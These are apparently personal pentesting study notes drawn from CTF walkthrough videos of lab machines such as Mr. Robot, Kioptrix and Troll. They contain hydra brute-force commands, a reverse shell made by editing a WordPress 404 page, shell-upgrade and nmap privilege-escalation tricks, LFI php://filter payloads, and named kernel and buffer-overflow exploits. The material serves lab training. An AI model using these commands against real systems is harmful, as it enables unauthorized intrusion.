https://github.com/NoobGajen/PentestingEverything

Techniques

Format 30=<space>name<space>30=
============================== From ==============================
https://www.youtube.com/watch?v=nuF5_vpKiuY&list=PLBf0hzazHTGOyRReqMyE-CDMWAQ5AgXO-&index=2

Mr. Robot CTF Walkthrough - Part 1 and Part 2

Format 30=<space>name<space>30=
============================== Learned ==============================

If you have a large dictionary then try to make it unique and in sorted

cat wordlist.disc | sort -u | uniq > wordlist1.disc

hydra -V -L wordlist.disc -p 123 192.168.1.108 http-post-form ‘/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username’


Instead go through web page I can do curl and instead of adding file I can change the internal php file for reverse shell 
nc -lvp 1234
curl http://192.168.1.108/404.php


What tty Means Today:
It represents the terminal session you're using.

If you’ve gotten a shell access (like through a reverse shell or a limited environment) and there’s no TTY, many commands won’t work properly (like sudo, su, nano, arrow keys, tab completion, etc.). So, you'll want to upgrade the shell to a full TTY.

/bin/sh -I
python -c 'import pty; pty.spawn("/bin/sh”)’


🧠 First: Check Your Shell Type
echo $0

Or just try:
tty

If it says something like:
not a tty
Then you’re in a non-interactive or barebones shell.


✅ Ways to Get a TTY (Interactive Shell)

🔹 1. Python TTY Upgrade (Most Popular)
python -c 'import pty; pty.spawn("/bin/bash")'

or if only Python3 is available:
python3 -c 'import pty; pty.spawn("/bin/bash")'


privilege esclation
find / -perm -4000 2>/dev/null

Nmap interactive mode
nmap —interactive
!sh


https://youtu.be/pgfYKUXGhOY?si=QnKh7hW3TxZI9qzV
Lampiao CTF Walkthrough - Boot-To-Root

============================== Learned ==============================

cewl tool to generate wordlists from site to make It a calculate wordlists
cewl http://192.168.1.106:1898/?q=node=1 -w wordlist.txt

https://github.com/InteliSecureLabs/Linux_Exploit_Suggester
wget https://github.com/InteliSecureLabs/Linux_Exploit_Suggester in vulnerable machine

If there is functionality to change language in website and it is allowing then there may probably be a Lfi vulnerability

Php encoder
=php://filter/conver.base64-encode/resource=shell
=php://filter/conver.base64-encode/resource=index

sudo -l
Shows all the file that can be run with root permission

https://github.com/0x00-0x00/FakePip




https://youtu.be/Qn2cKYZ6kBI?si=dn8GLSQzOf9SlNzA

Kioptrix Level 1 CTF Walkthrough - Boot-To-Root

============================== Learned ==============================

First 
nmap -sV -A 192.X.X.X.X
Then 
Intense scan
Then
Udp ports


rpcclient -U “” 192.x.x.x 
openfuckv2.c remote buffer overflow

/usr/share/exploitdb/exploits/unix/remote/764.c



https://youtu.be/IXC-05KGeGg?si=0ogpQ7FgbyE29B-o

Troll 1 CTF Walkthrough - Boot-To-Root

============================== Learned ==============================

hydra -V -L which_one_lol.txt -p Pass.txt ssh://192.x.x.x

dirtycow2 





